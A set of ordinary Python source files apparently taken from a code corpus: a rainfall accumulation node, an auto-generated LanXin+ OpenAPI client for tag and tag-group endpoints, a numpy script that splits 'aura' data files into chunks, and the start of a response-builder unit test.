            self.prev_day = now.day
            self.hourly_rain = 0
            self.daily_rain = 0
        if self.prev_week != now.isocalendar()[1]:
            LOGGER.info('Clearing old weekly, daily, hourly data')
            self.prev_week = now.isocalendar()[1]
            self.hourly_rain = 0
            self.daily_rain = 0
            self.weekly_rain = 0
        if self.prev_month != now.month:
            LOGGER.info('Clearing old monthly, daily, hourly data')
            self.prev_month = now.month
            self.hourly_rain = 0
            self.daily_rain = 0
            self.weekly_rain = 0
            self.monthly_rain = 0
        if self.prev_year != now.year:
            LOGGER.info('Clearing old yearly, monthly, daily, hourly data')
            self.prev_year = now.year
            self.hourly_rain = 0
            self.daily_rain = 0
            self.weekly_rain = 0
            self.monthly_rain = 0
            self.yearly_rain = 0

    def SetUnits(self, u):
        """Select reporting units ('mm' or 'in') and update driver UOMs.

        NOTE(review): this rewrites the class-level ``drivers`` list and
        node ``id``, which are shared by all instances -- acceptable only
        while a single precipitation node exists.
        """
        self.units = u
        if (u == 'mm'):
            self.drivers[0]['uom'] = 46
            self.drivers[1]['uom'] = 82
            self.drivers[2]['uom'] = 82
            self.drivers[3]['uom'] = 82
            self.drivers[4]['uom'] = 82
            self.drivers[5]['uom'] = 82
            self.drivers[6]['uom'] = 82
            self.id = 'precipitation'
        elif (u == 'in'):
            self.drivers[0]['uom'] = 24
            self.drivers[1]['uom'] = 105
            self.drivers[2]['uom'] = 105
            self.drivers[3]['uom'] = 105
            self.drivers[4]['uom'] = 105
            self.drivers[5]['uom'] = 105
            self.drivers[6]['uom'] = 105
            self.id = 'precipitationUS'

    def hourly_accumulation(self, r):
        """Add rainfall *r* (mm) to the hourly total, resetting on a new hour."""
        current_hour = datetime.datetime.now().hour
        if (current_hour != self.prev_hour):
            self.prev_hour = current_hour
            self.hourly_rain = 0
        self.hourly_rain += r
        return self.hourly_rain

    def daily_accumulation(self, r):
        """Add rainfall *r* (mm) to the daily total.

        On day rollover the finished total is kept as yesterday's rain
        before the daily accumulator is reset.
        """
        current_day = datetime.datetime.now().day
        if (current_day != self.prev_day):
            self.yesterday_rain = self.daily_rain
            self.prev_day = current_day
            self.daily_rain = 0
        self.daily_rain += r
        return self.daily_rain

    def yesterday_accumulation(self):
        """Return yesterday's total rainfall (mm)."""
        return self.yesterday_rain

    def weekly_accumulation(self, r):
        """Add rainfall *r* (mm) to the weekly total (ISO week rollover)."""
        (y, w, d) = datetime.datetime.now().isocalendar()
        if w != self.prev_week:
            self.prev_week = w
            self.weekly_rain = 0
        self.weekly_rain += r
        return self.weekly_rain

    def monthly_accumulation(self, r):
        """Add rainfall *r* (mm) to the monthly total, resetting on a new month."""
        current_month = datetime.datetime.now().month
        if (current_month != self.prev_month):
            self.prev_month = current_month
            self.monthly_rain = 0
        self.monthly_rain += r
        return self.monthly_rain

    def yearly_accumulation(self, r):
        """Add rainfall *r* (mm) to the yearly total, resetting on a new year."""
        current_year = datetime.datetime.now().year
        if (current_year != self.prev_year):
            self.prev_year = current_year
            self.yearly_rain = 0
        self.yearly_rain += r
        return self.yearly_rain

    def setDriver(self, driver, value):
        """Convert *value* (mm) to the configured units and report it."""
        if (self.units == 'in'):
            value = round(value * 0.03937, 2)
        else:
            value = round(value, 3)
        super(PrecipitationNode, self).setDriver(driver, value, report=True, force=True)
| 2.640625 | 3 |
lanxinplus_openapi/api/addrbk_tags_api.py | lanxinplus/lanxinplus-python-sdk | 0 | 12765057 | <gh_stars>0
"""
LanXin+ OpenAPI
LanXin+ OpenAPI Platform # noqa: E501
Generated by: https://openapi.lanxin.cn
"""
import re # noqa: F401
import sys # noqa: F401
from lanxinplus_openapi.api_client import ApiClient, Endpoint as _Endpoint
from lanxinplus_openapi.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from lanxinplus_openapi.model.v1_tag_groups_create_request_body import V1TagGroupsCreateRequestBody
from lanxinplus_openapi.model.v1_tag_groups_create_response import V1TagGroupsCreateResponse
from lanxinplus_openapi.model.v1_tag_groups_delete_response import V1TagGroupsDeleteResponse
from lanxinplus_openapi.model.v1_tag_groups_fetch_request_body import V1TagGroupsFetchRequestBody
from lanxinplus_openapi.model.v1_tag_groups_fetch_response import V1TagGroupsFetchResponse
from lanxinplus_openapi.model.v1_tag_groups_info_fetch_response import V1TagGroupsInfoFetchResponse
from lanxinplus_openapi.model.v1_tag_groups_update_request_body import V1TagGroupsUpdateRequestBody
from lanxinplus_openapi.model.v1_tag_groups_update_response import V1TagGroupsUpdateResponse
from lanxinplus_openapi.model.v1_tags_create_request_body import V1TagsCreateRequestBody
from lanxinplus_openapi.model.v1_tags_create_response import V1TagsCreateResponse
from lanxinplus_openapi.model.v1_tags_delete_response import V1TagsDeleteResponse
from lanxinplus_openapi.model.v1_tags_meta_fetch_request_body import V1TagsMetaFetchRequestBody
from lanxinplus_openapi.model.v1_tags_meta_fetch_response import V1TagsMetaFetchResponse
from lanxinplus_openapi.model.v1_tags_update_request_body import V1TagsUpdateRequestBody
from lanxinplus_openapi.model.v1_tags_update_response import V1TagsUpdateResponse
class AddrbkTagsApi(object):
"""NOTE: This class is auto generated by LanXin+
Ref: https://openapi.lanxin.cn
Do not edit the class manually.
"""
    def __init__(self, api_client=None):
        """Bind one _Endpoint descriptor per address-book tag operation.

        A default ApiClient is created when none is supplied.  Each
        descriptor below declares the route, HTTP method, parameter map,
        and (de)serialization types for a single generated API call.
        """
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client
        # POST /v1/taggroups/create -- create a tag group.
        self.v1_tag_groups_create_endpoint = _Endpoint(
            settings={
                'response_type': (V1TagGroupsCreateResponse,),
                'auth': [],
                'endpoint_path': '/v1/taggroups/create',
                'operation_id': 'v1_tag_groups_create',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': [
                    'app_token',
                    'v1_tag_groups_create_request_body',
                    'user_token',
                ],
                'required': [
                    'app_token',
                    'v1_tag_groups_create_request_body',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'app_token':
                        (str,),
                    'v1_tag_groups_create_request_body':
                        (V1TagGroupsCreateRequestBody,),
                    'user_token':
                        (str,),
                },
                'attribute_map': {
                    'app_token': 'app_token',
                    'user_token': 'user_token',
                },
                'location_map': {
                    'app_token': 'query',
                    'v1_tag_groups_create_request_body': 'body',
                    'user_token': 'query',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [
                    'application/json'
                ]
            },
            api_client=api_client
        )
        # POST /v1/taggroups/{tag_group_id}/delete -- delete a tag group.
        self.v1_tag_groups_delete_endpoint = _Endpoint(
            settings={
                'response_type': (V1TagGroupsDeleteResponse,),
                'auth': [],
                'endpoint_path': '/v1/taggroups/{tag_group_id}/delete',
                'operation_id': 'v1_tag_groups_delete',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': [
                    'app_token',
                    'tag_group_id',
                    'user_token',
                ],
                'required': [
                    'app_token',
                    'tag_group_id',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'app_token':
                        (str,),
                    'tag_group_id':
                        (str,),
                    'user_token':
                        (str,),
                },
                'attribute_map': {
                    'app_token': 'app_token',
                    'tag_group_id': 'tag_group_id',
                    'user_token': 'user_token',
                },
                'location_map': {
                    'app_token': 'query',
                    'tag_group_id': 'path',
                    'user_token': 'query',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [],
            },
            api_client=api_client
        )
        # POST /v1/taggroups/fetch -- list tag groups.
        self.v1_tag_groups_fetch_endpoint = _Endpoint(
            settings={
                'response_type': (V1TagGroupsFetchResponse,),
                'auth': [],
                'endpoint_path': '/v1/taggroups/fetch',
                'operation_id': 'v1_tag_groups_fetch',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': [
                    'app_token',
                    'v1_tag_groups_fetch_request_body',
                    'user_token',
                ],
                'required': [
                    'app_token',
                    'v1_tag_groups_fetch_request_body',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'app_token':
                        (str,),
                    'v1_tag_groups_fetch_request_body':
                        (V1TagGroupsFetchRequestBody,),
                    'user_token':
                        (str,),
                },
                'attribute_map': {
                    'app_token': 'app_token',
                    'user_token': 'user_token',
                },
                'location_map': {
                    'app_token': 'query',
                    'v1_tag_groups_fetch_request_body': 'body',
                    'user_token': 'query',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [
                    'application/json'
                ]
            },
            api_client=api_client
        )
        # GET /v1/taggroups/{tag_group_id}/fetch -- tag group details.
        self.v1_tag_groups_info_fetch_endpoint = _Endpoint(
            settings={
                'response_type': (V1TagGroupsInfoFetchResponse,),
                'auth': [],
                'endpoint_path': '/v1/taggroups/{tag_group_id}/fetch',
                'operation_id': 'v1_tag_groups_info_fetch',
                'http_method': 'GET',
                'servers': None,
            },
            params_map={
                'all': [
                    'app_token',
                    'tag_group_id',
                    'user_token',
                ],
                'required': [
                    'app_token',
                    'tag_group_id',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'app_token':
                        (str,),
                    'tag_group_id':
                        (str,),
                    'user_token':
                        (str,),
                },
                'attribute_map': {
                    'app_token': 'app_token',
                    'tag_group_id': 'tag_group_id',
                    'user_token': 'user_token',
                },
                'location_map': {
                    'app_token': 'query',
                    'tag_group_id': 'path',
                    'user_token': 'query',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [],
            },
            api_client=api_client
        )
        # POST /v1/taggroups/{tag_group_id}/update -- update a tag group.
        self.v1_tag_groups_update_endpoint = _Endpoint(
            settings={
                'response_type': (V1TagGroupsUpdateResponse,),
                'auth': [],
                'endpoint_path': '/v1/taggroups/{tag_group_id}/update',
                'operation_id': 'v1_tag_groups_update',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': [
                    'app_token',
                    'tag_group_id',
                    'v1_tag_groups_update_request_body',
                    'user_token',
                ],
                'required': [
                    'app_token',
                    'tag_group_id',
                    'v1_tag_groups_update_request_body',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'app_token':
                        (str,),
                    'tag_group_id':
                        (str,),
                    'v1_tag_groups_update_request_body':
                        (V1TagGroupsUpdateRequestBody,),
                    'user_token':
                        (str,),
                },
                'attribute_map': {
                    'app_token': 'app_token',
                    'tag_group_id': 'tag_group_id',
                    'user_token': 'user_token',
                },
                'location_map': {
                    'app_token': 'query',
                    'tag_group_id': 'path',
                    'v1_tag_groups_update_request_body': 'body',
                    'user_token': 'query',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [
                    'application/json'
                ]
            },
            api_client=api_client
        )
        # POST /v1/tags/create -- create a tag.
        self.v1_tags_create_endpoint = _Endpoint(
            settings={
                'response_type': (V1TagsCreateResponse,),
                'auth': [],
                'endpoint_path': '/v1/tags/create',
                'operation_id': 'v1_tags_create',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': [
                    'app_token',
                    'v1_tags_create_request_body',
                    'user_token',
                ],
                'required': [
                    'app_token',
                    'v1_tags_create_request_body',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'app_token':
                        (str,),
                    'v1_tags_create_request_body':
                        (V1TagsCreateRequestBody,),
                    'user_token':
                        (str,),
                },
                'attribute_map': {
                    'app_token': 'app_token',
                    'user_token': 'user_token',
                },
                'location_map': {
                    'app_token': 'query',
                    'v1_tags_create_request_body': 'body',
                    'user_token': 'query',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [
                    'application/json'
                ]
            },
            api_client=api_client
        )
        # POST /v1/tags/{tagid}/delete -- delete a tag.
        self.v1_tags_delete_endpoint = _Endpoint(
            settings={
                'response_type': (V1TagsDeleteResponse,),
                'auth': [],
                'endpoint_path': '/v1/tags/{tagid}/delete',
                'operation_id': 'v1_tags_delete',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': [
                    'app_token',
                    'tagid',
                    'user_token',
                ],
                'required': [
                    'app_token',
                    'tagid',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'app_token':
                        (str,),
                    'tagid':
                        (str,),
                    'user_token':
                        (str,),
                },
                'attribute_map': {
                    'app_token': 'app_token',
                    'tagid': 'tagid',
                    'user_token': 'user_token',
                },
                'location_map': {
                    'app_token': 'query',
                    'tagid': 'path',
                    'user_token': 'query',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [],
            },
            api_client=api_client
        )
        # POST /v1/tags/meta/fetch -- fetch tag metadata.
        self.v1_tags_meta_fetch_endpoint = _Endpoint(
            settings={
                'response_type': (V1TagsMetaFetchResponse,),
                'auth': [],
                'endpoint_path': '/v1/tags/meta/fetch',
                'operation_id': 'v1_tags_meta_fetch',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': [
                    'app_token',
                    'v1_tags_meta_fetch_request_body',
                    'user_token',
                ],
                'required': [
                    'app_token',
                    'v1_tags_meta_fetch_request_body',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'app_token':
                        (str,),
                    'v1_tags_meta_fetch_request_body':
                        (V1TagsMetaFetchRequestBody,),
                    'user_token':
                        (str,),
                },
                'attribute_map': {
                    'app_token': 'app_token',
                    'user_token': 'user_token',
                },
                'location_map': {
                    'app_token': 'query',
                    'v1_tags_meta_fetch_request_body': 'body',
                    'user_token': 'query',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [
                    'application/json'
                ]
            },
            api_client=api_client
        )
        # POST /v1/tags/{tagid}/update -- update a tag.
        self.v1_tags_update_endpoint = _Endpoint(
            settings={
                'response_type': (V1TagsUpdateResponse,),
                'auth': [],
                'endpoint_path': '/v1/tags/{tagid}/update',
                'operation_id': 'v1_tags_update',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': [
                    'app_token',
                    'tagid',
                    'v1_tags_update_request_body',
                    'user_token',
                ],
                'required': [
                    'app_token',
                    'tagid',
                    'v1_tags_update_request_body',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'app_token':
                        (str,),
                    'tagid':
                        (str,),
                    'v1_tags_update_request_body':
                        (V1TagsUpdateRequestBody,),
                    'user_token':
                        (str,),
                },
                'attribute_map': {
                    'app_token': 'app_token',
                    'tagid': 'tagid',
                    'user_token': 'user_token',
                },
                'location_map': {
                    'app_token': 'query',
                    'tagid': 'path',
                    'v1_tags_update_request_body': 'body',
                    'user_token': 'query',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [
                    'application/json'
                ]
            },
            api_client=api_client
        )
def v1_tag_groups_create(
self,
app_token,
v1_tag_groups_create_request_body,
**kwargs
):
"""创建标签分组 # noqa: E501
创建标签分组 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tag_groups_create(app_token, v1_tag_groups_create_request_body, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
v1_tag_groups_create_request_body (V1TagGroupsCreateRequestBody): Request Body
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagGroupsCreateResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['v1_tag_groups_create_request_body'] = \
v1_tag_groups_create_request_body
return self.v1_tag_groups_create_endpoint.call_with_http_info(**kwargs)
def v1_tag_groups_delete(
self,
app_token,
tag_group_id,
**kwargs
):
"""删除标签分组 # noqa: E501
删除标签分组 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tag_groups_delete(app_token, tag_group_id, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
tag_group_id (str): tag_group_id
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagGroupsDeleteResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['tag_group_id'] = \
tag_group_id
return self.v1_tag_groups_delete_endpoint.call_with_http_info(**kwargs)
def v1_tag_groups_fetch(
self,
app_token,
v1_tag_groups_fetch_request_body,
**kwargs
):
"""获取标签分组列表 # noqa: E501
获取标签分组列表 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tag_groups_fetch(app_token, v1_tag_groups_fetch_request_body, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
v1_tag_groups_fetch_request_body (V1TagGroupsFetchRequestBody): Request Body
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagGroupsFetchResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['v1_tag_groups_fetch_request_body'] = \
v1_tag_groups_fetch_request_body
return self.v1_tag_groups_fetch_endpoint.call_with_http_info(**kwargs)
def v1_tag_groups_info_fetch(
self,
app_token,
tag_group_id,
**kwargs
):
"""获取标签分组详情 # noqa: E501
获取标签分组详情 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tag_groups_info_fetch(app_token, tag_group_id, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
tag_group_id (str): tag_group_id
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagGroupsInfoFetchResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['tag_group_id'] = \
tag_group_id
return self.v1_tag_groups_info_fetch_endpoint.call_with_http_info(**kwargs)
def v1_tag_groups_update(
self,
app_token,
tag_group_id,
v1_tag_groups_update_request_body,
**kwargs
):
"""修改标签分组 # noqa: E501
修改标签分组 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tag_groups_update(app_token, tag_group_id, v1_tag_groups_update_request_body, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
tag_group_id (str): tag_group_id
v1_tag_groups_update_request_body (V1TagGroupsUpdateRequestBody): Request Body
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagGroupsUpdateResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['tag_group_id'] = \
tag_group_id
kwargs['v1_tag_groups_update_request_body'] = \
v1_tag_groups_update_request_body
return self.v1_tag_groups_update_endpoint.call_with_http_info(**kwargs)
def v1_tags_create(
self,
app_token,
v1_tags_create_request_body,
**kwargs
):
"""创建标签 # noqa: E501
创建标签 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tags_create(app_token, v1_tags_create_request_body, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
v1_tags_create_request_body (V1TagsCreateRequestBody): Request Body
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagsCreateResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['v1_tags_create_request_body'] = \
v1_tags_create_request_body
return self.v1_tags_create_endpoint.call_with_http_info(**kwargs)
def v1_tags_delete(
self,
app_token,
tagid,
**kwargs
):
"""删除标签 # noqa: E501
删除标签 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tags_delete(app_token, tagid, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
tagid (str): tagid
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagsDeleteResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['tagid'] = \
tagid
return self.v1_tags_delete_endpoint.call_with_http_info(**kwargs)
def v1_tags_meta_fetch(
self,
app_token,
v1_tags_meta_fetch_request_body,
**kwargs
):
"""获取标签详情 # noqa: E501
获取标签详情 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tags_meta_fetch(app_token, v1_tags_meta_fetch_request_body, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
v1_tags_meta_fetch_request_body (V1TagsMetaFetchRequestBody): Request Body
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagsMetaFetchResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['v1_tags_meta_fetch_request_body'] = \
v1_tags_meta_fetch_request_body
return self.v1_tags_meta_fetch_endpoint.call_with_http_info(**kwargs)
def v1_tags_update(
self,
app_token,
tagid,
v1_tags_update_request_body,
**kwargs
):
"""修改标签 # noqa: E501
修改标签 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tags_update(app_token, tagid, v1_tags_update_request_body, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
tagid (str): tagid
v1_tags_update_request_body (V1TagsUpdateRequestBody): Request Body
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagsUpdateResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['tagid'] = \
tagid
kwargs['v1_tags_update_request_body'] = \
v1_tags_update_request_body
return self.v1_tags_update_endpoint.call_with_http_info(**kwargs)
| 1.40625 | 1 |
aura/aura_breaker.py | FrankWhoee/Aura | 1 | 12765058 | import numpy as np
from aura import aura_loader
import os
import time
import random
def break_aura(path, pieces):
    """
    Breaks an aura file into equally sized chunks and saves them to a new
    time-stamped folder next to the working directory.

    :param path: A string type of the path to the aura file that is being chunked.
    :param pieces: An integer type of how many pieces should result.
        When the slice count is not divisible by ``pieces``, the trailing
        remainder slices are dropped (same as the original per-index copy).
    """
    array = aura_loader.read_file(path)
    filepath = "../ChunkedAura" + str(time.time())[5:10]
    print("Saving to " + filepath)
    os.mkdir(filepath)
    l, w, n = array.shape
    print(array.shape)
    chunkSize = n // pieces  # integer chunk length along the last axis
    print("Chunking into " + str(chunkSize) + " sized pieces.")
    for piece in range(pieces):
        print("Chunking piece " + str(piece))
        start = chunkSize * piece
        print("Extracting " + str(start) + " to " + str(start + chunkSize))
        # Vectorized slice + cast replaces the per-index copy loop; astype
        # also guarantees a float16 contiguous buffer for tofile().
        chunk = array[:, :, start:start + chunkSize].astype(np.float16)
        f = filepath + "/{" + str(l) + "x" + str(w) + "x" + str(chunk.shape[2]) + "}Chunk" + str(piece) + ".aura"
        print("Saving chunk " + str(piece) + " to " + f + "\n")
        chunk.tofile(f)
    print("----------------- CHUNKING COMPLETE -----------------")
def percentise_aura(path, percent):
    """
    Breaks an aura file into two pieces of percent sizes.

    :param path: A string type of the path to the aura file that is being chunked.
    :param percent: A float or double type of the percentage that should be in the first chunk.
        Example: percent=0.9 would be 90% of data in first chunk, 10% in the second chunk.

    NOTE(review): because both sizes are truncated with int(), up to one
    sample can be dropped when n * percent is not integral — confirm this is
    acceptable for callers.
    """
    array = aura_loader.read_file(path).T
    random.shuffle(array)  # shuffles along the first axis only
    filepath = "../ChunkedAura" + str(time.time())[5:10]
    print("Saving to " + filepath)
    os.mkdir(filepath)
    n, l, w = array.shape
    print(array.shape)
    print("Chunking into " + str(percent * 100) + "% and " + str((1 - percent) * 100) + "%")
    size1 = int(n * percent)
    size2 = int(n * (1 - percent))
    print("Chunk1 size = " + str(size1))
    print("Chunk2 size = " + str(size2))
    chunk1 = np.zeros((l, w, size1), dtype=np.float16)
    chunk2 = np.zeros((l, w, size2), dtype=np.float16)
    print("Chunking piece 1")
    for i in range(size1):
        chunk1[:, :, i] = array[i]
    f1 = filepath + "/{" + str(chunk1.shape[0]) + "x" + str(chunk1.shape[1]) + "x" + str(
        chunk1.shape[2]) + "}Chunk1.aura"
    print("Saving chunk1 to " + f1 + "\n")
    chunk1.tofile(f1)
    for i in range(size2):
        chunk2[:, :, i] = array[i + (size1)]
    f2 = filepath + "/{" + str(chunk2.shape[0]) + "x" + str(chunk2.shape[1]) + "x" + str(
        chunk2.shape[2]) + "}Chunk2.aura"
    # Fixed: the original printed "Saving chunk1" for the second chunk.
    print("Saving chunk2 to " + f2 + "\n")
    chunk2.tofile(f2)
    print("----------------- CHUNKING COMPLETE -----------------")
| 3.1875 | 3 |
tests/test_xlibs.py | diatoid/xlambda | 39 | 12765059 | <gh_stars>10-100
'''Test xlibs'''
from typing import Dict
import unittest
from unittest.mock import patch
from xlibs import constants, mutant, utils
from xlibs.response import build
class TestResponse(unittest.TestCase):
    '''Test the response routine (xlibs.response.build).'''
    def test_build_simple(self):
        '''Test the build function with a simplified response'''
        # Only `status` supplied; every other field must default to None.
        r = build(
            status=200,
        )
